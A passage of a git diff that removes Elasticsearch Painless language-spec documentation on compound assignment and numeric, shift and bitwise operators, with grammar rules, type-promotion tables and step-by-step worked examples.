i%3`) -<5> load from `i` -> `int 1`; - add `int 1` and `int 5` -> `int 6`; - store `int 6` to `i`; - (note this is equivalent to `i = i+5`) -<6> load from `i` -> `int 6`; - subtract `int 5` from `int 6` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i-5`) -<7> load from `i` -> `int 1`; - left shift `int 1` by `int 2` -> `int 4`; - store `int 4` to `i`; - (note this is equivalent to `i = i<<2`) -<8> load from `i` -> `int 4`; - right shift `int 4` by `int 1` -> `int 2`; - store `int 2` to `i`; - (note this is equivalent to `i = i>>1`) -<9> load from `i` -> `int 2`; - unsigned right shift `int 2` by `int 1` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i>>>1`) -<10> load from `i` -> `int 1`; - bitwise and `int 1` and `int 15` -> `int 1`; - store `int 1` to `i`; - (note this is equivalent to `i = i&2`) -<11> load from `i` -> `int 1`; - bitwise xor `int 1` and `int 12` -> `int 13`; - store `int 13` to `i`; - (note this is equivalent to `i = i^2`) -<12> load from `i` -> `int 13`; - bitwise or `int 13` and `int 2` -> `int 15`; - store `int 15` to `i`; - (note this is equivalent to `i = i|2`) -+ -* Compound assignment for each boolean operator. -+ -[source,Painless] ----- -boolean b = true; <1> -b &= false; <2> -b ^= false; <3> -b |= true; <4> ----- -+ -<1> declare `boolean b`; - store `boolean true` in `b`; -<2> load from `b` -> `boolean true`; - boolean and `boolean true` and `boolean false` -> `boolean false`; - store `boolean false` to `b`; - (note this is equivalent to `b = b && false`) -<3> load from `b` -> `boolean false`; - boolean xor `boolean false` and `boolean false` -> `boolean false`; - store `boolean false` to `b`; - (note this is equivalent to `b = b ^ false`) -<4> load from `b` -> `boolean true`; - boolean or `boolean false` and `boolean true` -> `boolean true`; - store `boolean true` to `b`; - (note this is equivalent to `b = b || true`) -+ -* A compound assignment with the string concatenation operator. -+ -[source,Painless] ----- -String s = 'compound'; <1> -s += ' assignment'; <2> ----- -<1> declare `String s`; - store `String 'compound'` to `s`; -<2> load from `s` -> `String 'compound'`; - string concat `String 'compound'` and `String ' assignment''` - -> `String 'compound assignment'`; - store `String 'compound assignment'` to `s`; - (note this is equivalent to `s = s + ' assignment'`) -+ -* A compound assignment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x += 2; <2> ----- -<1> declare `def x`; - implicit cast `int 1` to `def`; - store `def` to `x`; -<2> load from `x` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - implicit cast `int 3` to `def` -> `def`; - store `def` to `x`; - (note this is equivalent to `x = x+2`) -+ -* A compound assignment with an extra implicit cast. -+ -[source,Painless] ----- -byte b = 1; <1> -b += 2; <2> ----- -<1> declare `byte b`; - store `byte 1` to `x`; -<2> load from `x` -> `byte 1`; - implicit cast `byte 1 to `int 1` -> `int 1`; - add `int 1` and `int 2` -> `int 3`; - implicit cast `int 3` to `byte 3` -> `byte 3`; - store `byte 3` to `b`; - (note this is equivalent to `b = b+2`) diff --git a/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc b/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc deleted file mode 100644 index 1b08d9c3361..00000000000 --- a/docs/painless/painless-lang-spec/painless-operators-numeric.asciidoc +++ /dev/null @@ -1,1339 +0,0 @@ -[[painless-operators-numeric]] -=== Operators: Numeric - -[[post-increment-operator]] -==== Post Increment - -Use the `post increment operator '++'` to INCREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded prior to the -increment. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -post_increment: ( variable | field ) '++'; ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Post increment with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> -i++; <2> -long j = 1; <3> -long k; <4> -k = j++; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - add `int 0` and `int 1` -> `int 1`; - implicit cast `int 1` to `short 1`; - store `short 1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - store `long 1` to `k`; - add `long 1` and `long 1` -> `long 2`; - store `long 2` to `j` -+ -* Post increment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x++; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - add `int 1` and `int 1` -> `int 2`; - implicit cast `int 2` to `def`; - store `def` to `x` - -[[post-decrement-operator]] -==== Post Decrement - -Use the `post decrement operator '--'` to DECREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded prior to -the decrement. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -post_decrement: ( variable | field ) '--'; ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Post decrement with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> -i--; <2> -long j = 1; <3> -long k; <4> -k = j--; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - subtract `int 1` from `int 0` -> `int -1`; - implicit cast `int -1` to `short -1`; - store `short -1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - store `long 1` to `k`; - subtract `long 1` from `long 1` -> `long 0`; - store `long 0` to `j` -+ -* Post decrement with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -x--; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - subtract `int 1` from `int 1` -> `int 0`; - implicit cast `int 0` to `def`; - store `def` to `x` - -[[pre-increment-operator]] -==== Pre Increment - -Use the `pre increment operator '++'` to INCREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded after the -increment. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -pre_increment: '++' ( variable | field ); ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Pre increment with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> -++i; <2> -long j = 1; <3> -long k; <4> -k = ++j; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - add `int 0` and `int 1` -> `int 1`; - implicit cast `int 1` to `short 1`; - store `short 1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - add `long 1` and `long 1` -> `long 2`; - store `long 2` to `j`; - store `long 2` to `k` -+ -* Pre increment with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> -++x; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - add `int 1` and `int 1` -> `int 2`; - implicit cast `int 2` to `def`; - store `def` to `x` - -[[pre-decrement-operator]] -==== Pre Decrement - -Use the `pre decrement operator '--'` to DECREASE the value of a numeric type -variable/field by `1`. An extra implicit cast is necessary to return the -promoted numeric type value to the original numeric type value of the -variable/field for the following types: `byte`, `short`, and `char`. If a -variable/field is read as part of an expression the value is loaded after the -decrement. - -*Errors* - -* If the variable/field is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -pre_decrement: '--' ( variable | field ); ----- - -*Promotion* - -[options="header",cols="<1,<1,<1"] -|==== -| original | promoted | implicit -| byte | int | byte -| short | int | short -| char | int | char -| int | int | -| long | long | -| float | float | -| double | double | -| def | def | -|==== - -*Examples* - -* Pre decrement with different numeric types. -+ -[source,Painless] ----- -short i = 0; <1> ---i; <2> -long j = 1; <3> -long k; <4> -k = --j; <5> ----- -+ -<1> declare `short i`; - store `short 0` to `i` -<2> load from `i` -> `short 0`; - promote `short 0`: result `int`; - subtract `int 1` from `int 0` -> `int -1`; - implicit cast `int -1` to `short -1`; - store `short -1` to `i` -<3> declare `long j`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `j` -<4> declare `long k`; - store default `long 0` to `k` -<5> load from `j` -> `long 1`; - subtract `long 1` from `long 1` -> `long 0`; - store `long 0` to `j` - store `long 0` to `k`; -+ -* Pre decrement operator with the `def` type. -+ -[source,Painless] ----- -def x = 1; <1> ---x; <2> ----- -+ -<1> declare `def x`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `x` -<2> load from `x` -> `def`; - implicit cast `def` to `int 1`; - subtract `int 1` from `int 1` -> `int 0`; - implicit cast `int 0` to `def`; - store `def` to `x` - -[[unary-positive-operator]] -==== Unary Positive - -Use the `unary positive operator '+'` to the preserve the IDENTITY of a -numeric type value. - -*Errors* - -* If the value is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -unary_positive: '+' expression; ----- - -*Examples* - -* Unary positive with different numeric types. -+ -[source,Painless] ----- -int x = +1; <1> -long y = +x; <2> ----- -+ -<1> declare `int x`; - identity `int 1` -> `int 1`; - store `int 1` to `x` -<2> declare `long y`; - load from `x` -> `int 1`; - identity `int 1` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `y` -+ -* Unary positive with the `def` type. -+ -[source,Painless] ----- -def z = +1; <1> -int i = +z; <2> ----- -<1> declare `def z`; - identity `int 1` -> `int 1`; - implicit cast `int 1` to `def`; - store `def` to `z` -<2> declare `int i`; - load from `z` -> `def`; - implicit cast `def` to `int 1`; - identity `int 1` -> `int 1`; - store `int 1` to `i`; - -[[unary-negative-operator]] -==== Unary Negative - -Use the `unary negative operator '-'` to NEGATE a numeric type value. - -*Errors* - -* If the value is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -unary_negative: '-' expression; ----- - -*Examples* - -* Unary negative with different numeric types. -+ -[source,Painless] ----- -int x = -1; <1> -long y = -x; <2> ----- -+ -<1> declare `int x`; - negate `int 1` -> `int -1`; - store `int -1` to `x` -<2> declare `long y`; - load from `x` -> `int 1`; - negate `int -1` -> `int 1`; - implicit cast `int 1` to `long 1` -> `long 1`; - store `long 1` to `y` -+ -* Unary negative with the `def` type. -+ -[source,Painless] ----- -def z = -1; <1> -int i = -z; <2> ----- -<1> declare `def z`; - negate `int 1` -> `int -1`; - implicit cast `int -1` to `def`; - store `def` to `z` -<2> declare `int i`; - load from `z` -> `def`; - implicit cast `def` to `int -1`; - negate `int -1` -> `int 1`; - store `int 1` to `i`; - -[[bitwise-not-operator]] -==== Bitwise Not - -Use the `bitwise not operator '~'` to NOT each bit in an integer type value -where a `1-bit` is flipped to a resultant `0-bit` and a `0-bit` is flipped to a -resultant `1-bit`. - -*Errors* - -* If the value is a non-integer type. - -*Bits* - -[options="header",cols="<1,<1"] -|==== -| original | result -| 1 | 0 -| 0 | 1 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_not: '~' expression; ----- - -*Promotion* - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Bitwise not with different numeric types. -+ -[source,Painless] ----- -byte b = 1; <1> -int i = ~b; <2> -long l = ~i; <3> ----- -+ -<1> declare `byte x`; - store `byte 1` to b -<2> declare `int i`; - load from `b` -> `byte 1`; - implicit cast `byte 1` to `int 1` -> `int 1`; - bitwise not `int 1` -> `int -2`; - store `int -2` to `i` -<3> declare `long l`; - load from `i` -> `int -2`; - implicit cast `int -2` to `long -2` -> `long -2`; - bitwise not `long -2` -> `long 1`; - store `long 1` to `l` -+ -* Bitwise not with the `def` type. -+ -[source,Painless] ----- -def d = 1; <1> -def e = ~d; <2> ----- -+ -<1> declare `def d`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `d`; -<2> declare `def e`; - load from `d` -> `def`; - implicit cast `def` to `int 1` -> `int 1`; - bitwise not `int 1` -> `int -2`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `e` - -[[multiplication-operator]] -==== Multiplication - -Use the `multiplication operator '*'` to MULTIPLY together two numeric type -values. Rules for resultant overflow and NaN values follow the JVM -specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -multiplication: expression '*' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Multiplication with different numeric types. -+ -[source,Painless] ----- -int i = 5*4; <1> -double d = i*7.0; <2> ----- -+ -<1> declare `int i`; - multiply `int 4` by `int 5` -> `int 20`; - store `int 20` in `i` -<2> declare `double d`; - load from `int i` -> `int 20`; - promote `int 20` and `double 7.0`: result `double`; - implicit cast `int 20` to `double 20.0` -> `double 20.0`; - multiply `double 20.0` by `double 7.0` -> `double 140.0`; - store `double 140.0` to `d` -+ -* Multiplication with the `def` type. -+ -[source,Painless] ----- -def x = 5*4; <1> -def y = x*2; <2> ----- -<1> declare `def x`; - multiply `int 5` by `int 4` -> `int 20`; - implicit cast `int 20` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 20`; - multiply `int 20` by `int 2` -> `int 40`; - implicit cast `int 40` to `def` -> `def`; - store `def` to `y` - -[[division-operator]] -==== Division - -Use the `division operator '/'` to DIVIDE one numeric type value by another. -Rules for NaN values and division by zero follow the JVM specification. Division -with integer values drops the remainder of the resultant value. - -*Errors* - -* If either of the values is a non-numeric type. -* If a left-hand side integer type value is divided by a right-hand side integer - type value of `0`. - -*Grammar* - -[source,ANTLR4] ----- -division: expression '/' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Division with different numeric types. -+ -[source,Painless] ----- -int i = 29/4; <1> -double d = i/7.0; <2> ----- -+ -<1> declare `int i`; - divide `int 29` by `int 4` -> `int 7`; - store `int 7` in `i` -<2> declare `double d`; - load from `int i` -> `int 7`; - promote `int 7` and `double 7.0`: result `double`; - implicit cast `int 7` to `double 7.0` -> `double 7.0`; - divide `double 7.0` by `double 7.0` -> `double 1.0`; - store `double 1.0` to `d` -+ -* Division with the `def` type. -+ -[source,Painless] ----- -def x = 5/4; <1> -def y = x/2; <2> ----- -<1> declare `def x`; - divide `int 5` by `int 4` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 1`; - divide `int 1` by `int 2` -> `int 0`; - implicit cast `int 0` to `def` -> `def`; - store `def` to `y` - -[[remainder-operator]] -==== Remainder - -Use the `remainder operator '%'` to calculate the REMAINDER for division -between two numeric type values. Rules for NaN values and division by zero follow the JVM -specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -remainder: expression '%' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Remainder with different numeric types. -+ -[source,Painless] ----- -int i = 29%4; <1> -double d = i%7.0; <2> ----- -+ -<1> declare `int i`; - remainder `int 29` by `int 4` -> `int 1`; - store `int 7` in `i` -<2> declare `double d`; - load from `int i` -> `int 1`; - promote `int 1` and `double 7.0`: result `double`; - implicit cast `int 1` to `double 1.0` -> `double 1.0`; - remainder `double 1.0` by `double 7.0` -> `double 1.0`; - store `double 1.0` to `d` -+ -* Remainder with the `def` type. -+ -[source,Painless] ----- -def x = 5%4; <1> -def y = x%2; <2> ----- -<1> declare `def x`; - remainder `int 5` by `int 4` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 1`; - remainder `int 1` by `int 2` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` to `y` - -[[addition-operator]] -==== Addition - -Use the `addition operator '+'` to ADD together two numeric type values. Rules -for resultant overflow and NaN values follow the JVM specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -addition: expression '+' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Addition operator with different numeric types. -+ -[source,Painless] ----- -int i = 29+4; <1> -double d = i+7.0; <2> ----- -+ -<1> declare `int i`; - add `int 29` and `int 4` -> `int 33`; - store `int 33` in `i` -<2> declare `double d`; - load from `int i` -> `int 33`; - promote `int 33` and `double 7.0`: result `double`; - implicit cast `int 33` to `double 33.0` -> `double 33.0`; - add `double 33.0` and `double 7.0` -> `double 40.0`; - store `double 40.0` to `d` -+ -* Addition with the `def` type. -+ -[source,Painless] ----- -def x = 5+4; <1> -def y = x+2; <2> ----- -<1> declare `def x`; - add `int 5` and `int 4` -> `int 9`; - implicit cast `int 9` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 9`; - add `int 9` and `int 2` -> `int 11`; - implicit cast `int 11` to `def` -> `def`; - store `def` to `y` - -[[subtraction-operator]] -==== Subtraction - -Use the `subtraction operator '-'` to SUBTRACT a right-hand side numeric type -value from a left-hand side numeric type value. Rules for resultant overflow -and NaN values follow the JVM specification. - -*Errors* - -* If either of the values is a non-numeric type. - -*Grammar* - -[source,ANTLR4] ----- -subtraction: expression '-' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | float | double | def -| byte | int | int | int | int | long | float | double | def -| short | int | int | int | int | long | float | double | def -| char | int | int | int | int | long | float | double | def -| int | int | int | int | int | long | float | double | def -| long | long | long | long | long | long | float | double | def -| float | float | float | float | float | float | float | double | def -| double | double | double | double | double | double | double | double | def -| def | def | def | def | def | def | def | def | def -|==== - -*Examples* - -* Subtraction with different numeric types. -+ -[source,Painless] ----- -int i = 29-4; <1> -double d = i-7.5; <2> ----- -+ -<1> declare `int i`; - subtract `int 4` from `int 29` -> `int 25`; - store `int 25` in `i` -<2> declare `double d` - load from `int i` -> `int 25`; - promote `int 25` and `double 7.5`: result `double`; - implicit cast `int 25` to `double 25.0` -> `double 25.0`; - subtract `double 33.0` by `double 7.5` -> `double 25.5`; - store `double 25.5` to `d` -+ -* Subtraction with the `def` type. -+ -[source,Painless] ----- -def x = 5-4; <1> -def y = x-2; <2> ----- -<1> declare `def x`; - subtract `int 4` and `int 5` -> `int 1`; - implicit cast `int 1` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 1`; - subtract `int 2` from `int 1` -> `int -1`; - implicit cast `int -1` to `def` -> `def`; - store `def` to `y` - -[[left-shift-operator]] -==== Left Shift - -Use the `left shift operator '<<'` to SHIFT lower order bits to higher order -bits in a left-hand side integer type value by the distance specified in a -right-hand side integer type value. - -*Errors* - -* If either of the values is a non-integer type. -* If the right-hand side value cannot be cast to an int type. - -*Grammar* - -[source,ANTLR4] ----- -left_shift: expression '<<' expression; ----- - -*Promotion* - -The left-hand side integer type value is promoted as specified in the table -below. The right-hand side integer type value is always implicitly cast to an -`int` type value and truncated to the number of bits of the promoted type value. - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Left shift with different integer types. -+ -[source,Painless] ----- -int i = 4 << 1; <1> -long l = i << 2L; <2> ----- -+ -<1> declare `int i`; - left shift `int 4` by `int 1` -> `int 8`; - store `int 8` in `i` -<2> declare `long l` - load from `int i` -> `int 8`; - implicit cast `long 2` to `int 2` -> `int 2`; - left shift `int 8` by `int 2` -> `int 32`; - implicit cast `int 32` to `long 32` -> `long 32`; - store `long 32` to `l` -+ -* Left shift with the `def` type. -+ -[source,Painless] ----- -def x = 4 << 2; <1> -def y = x << 1; <2> ----- -<1> declare `def x`; - left shift `int 4` by `int 2` -> `int 16`; - implicit cast `int 16` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 16`; - left shift `int 16` by `int 1` -> `int 32`; - implicit cast `int 32` to `def` -> `def`; - store `def` to `y` - -[[right-shift-operator]] -==== Right Shift - -Use the `right shift operator '>>'` to SHIFT higher order bits to lower order -bits in a left-hand side integer type value by the distance specified in a -right-hand side integer type value. The highest order bit of the left-hand side -integer type value is preserved. - -*Errors* - -* If either of the values is a non-integer type. -* If the right-hand side value cannot be cast to an int type. - -*Grammar* - -[source,ANTLR4] ----- -right_shift: expression '>>' expression; ----- - -*Promotion* - -The left-hand side integer type value is promoted as specified in the table -below. The right-hand side integer type value is always implicitly cast to an -`int` type value and truncated to the number of bits of the promoted type value. - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Right shift with different integer types. -+ -[source,Painless] ----- -int i = 32 >> 1; <1> -long l = i >> 2L; <2> ----- -+ -<1> declare `int i`; - right shift `int 32` by `int 1` -> `int 16`; - store `int 16` in `i` -<2> declare `long l` - load from `int i` -> `int 16`; - implicit cast `long 2` to `int 2` -> `int 2`; - right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `long 4` -> `long 4`; - store `long 4` to `l` -+ -* Right shift with the `def` type. -+ -[source,Painless] ----- -def x = 16 >> 2; <1> -def y = x >> 1; <2> ----- -<1> declare `def x`; - right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 4`; - right shift `int 4` by `int 1` -> `int 2`; - implicit cast `int 2` to `def` -> `def`; - store `def` to `y` - -[[unsigned-right-shift-operator]] -==== Unsigned Right Shift - -Use the `unsigned right shift operator '>>>'` to SHIFT higher order bits to -lower order bits in a left-hand side integer type value by the distance -specified in a right-hand side type integer value. The highest order bit of the -left-hand side integer type value is *not* preserved. - -*Errors* - -* If either of the values is a non-integer type. -* If the right-hand side value cannot be cast to an int type. - -*Grammar* - -[source,ANTLR4] ----- -unsigned_right_shift: expression '>>>' expression; ----- - -*Promotion* - -The left-hand side integer type value is promoted as specified in the table -below. The right-hand side integer type value is always implicitly cast to an -`int` type value and truncated to the number of bits of the promoted type value. - -[options="header",cols="<1,<1"] -|==== -| original | promoted -| byte | int -| short | int -| char | int -| int | int -| long | long -| def | def -|==== - -*Examples* - -* Unsigned right shift with different integer types. -+ -[source,Painless] ----- -int i = -1 >>> 29; <1> -long l = i >>> 2L; <2> ----- -+ -<1> declare `int i`; - unsigned right shift `int -1` by `int 29` -> `int 7`; - store `int 7` in `i` -<2> declare `long l` - load from `int i` -> `int 7`; - implicit cast `long 2` to `int 2` -> `int 2`; - unsigned right shift `int 7` by `int 2` -> `int 3`; - implicit cast `int 3` to `long 3` -> `long 3`; - store `long 3` to `l` -+ -* Unsigned right shift with the `def` type. -+ -[source,Painless] ----- -def x = 16 >>> 2; <1> -def y = x >>> 1; <2> ----- -<1> declare `def x`; - unsigned right shift `int 16` by `int 2` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 4`; - unsigned right shift `int 4` by `int 1` -> `int 2`; - implicit cast `int 2` to `def` -> `def`; - store `def` to `y` - -[[bitwise-and-operator]] -==== Bitwise And - -Use the `bitwise and operator '&'` to AND together each bit within two -integer type values where if both bits at the same index are `1` the resultant -bit is `1` and `0` otherwise. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 1 | 0 -| 0 | 0 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_and: expression '&' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise and with different integer types. -+ -[source,Painless] ----- -int i = 5 & 6; <1> -long l = i & 5L; <2> ----- -+ -<1> declare `int i`; - bitwise and `int 5` and `int 6` -> `int 4`; - store `int 4` in `i` -<2> declare `long l` - load from `int i` -> `int 4`; - promote `int 4` and `long 5`: result `long`; - implicit cast `int 4` to `long 4` -> `long 4`; - bitwise and `long 4` and `long 5` -> `long 4`; - store `long 4` to `l` -+ -* Bitwise and with the `def` type. -+ -[source,Painless] ----- -def x = 15 & 6; <1> -def y = x & 5; <2> ----- -<1> declare `def x`; - bitwise and `int 15` and `int 6` -> `int 6`; - implicit cast `int 6` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 6`; - bitwise and `int 6` and `int 5` -> `int 4`; - implicit cast `int 4` to `def` -> `def`; - store `def` to `y` - -[[bitwise-xor-operator]] -==== Bitwise Xor - -Use the `bitwise xor operator '^'` to XOR together each bit within two integer -type values where if one bit is a `1` and the other bit is a `0` at the same -index the resultant bit is `1` otherwise the resultant bit is `0`. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -The following table illustrates the resultant bit from the xoring of two bits. - -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 0 | 1 -| 0 | 1 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_xor: expression '^' expression; ----- - -*Promotion* - -[cols="<1,^1,^1,^1,^1,^1,^1"] -|==== -| | byte | short | char | int | long | def -| byte | int | int | int | int | long | def -| short | int | int | int | int | long | def -| char | int | int | int | int | long | def -| int | int | int | int | int | long | def -| long | long | long | long | long | long | def -| def | def | def | def | def | def | def -|==== - -*Examples* - -* Bitwise xor with different integer types. -+ -[source,Painless] ----- -int i = 5 ^ 6; <1> -long l = i ^ 5L; <2> ----- -+ -<1> declare `int i`; - bitwise xor `int 5` and `int 6` -> `int 3`; - store `int 3` in `i` -<2> declare `long l` - load from `int i` -> `int 4`; - promote `int 3` and `long 5`: result `long`; - implicit cast `int 3` to `long 3` -> `long 3`; - bitwise xor `long 3` and `long 5` -> `long 6`; - store `long 6` to `l` -+ -* Bitwise xor with the `def` type. -+ -[source,Painless] ----- -def x = 15 ^ 6; <1> -def y = x ^ 5; <2> ----- -<1> declare `def x`; - bitwise xor `int 15` and `int 6` -> `int 9`; - implicit cast `int 9` to `def` -> `def`; - store `def` in `x` -<2> declare `def y`; - load from `x` -> `def`; - implicit cast `def` to `int 9`; - bitwise xor `int 9` and `int 5` -> `int 12`; - implicit cast `int 12` to `def` -> `def`; - store `def` to `y` - -[[bitwise-or-operator]] -==== Bitwise Or - -Use the `bitwise or operator '|'` to OR together each bit within two integer -type values where if at least one bit is a `1` at the same index the resultant -bit is `1` otherwise the resultant bit is `0`. - -*Errors* - -* If either of the values is a non-integer type. - -*Bits* - -The following table illustrates the resultant bit from the oring of two bits. - -[cols="^1,^1,^1"] -|==== -| | 1 | 0 -| 1 | 1 | 1 -| 0 | 1 | 0 -|==== - -*Grammar* - -[source,ANTLR4] ----- -bitwise_or: expression '|' expression; ----- - -*Promotion* - 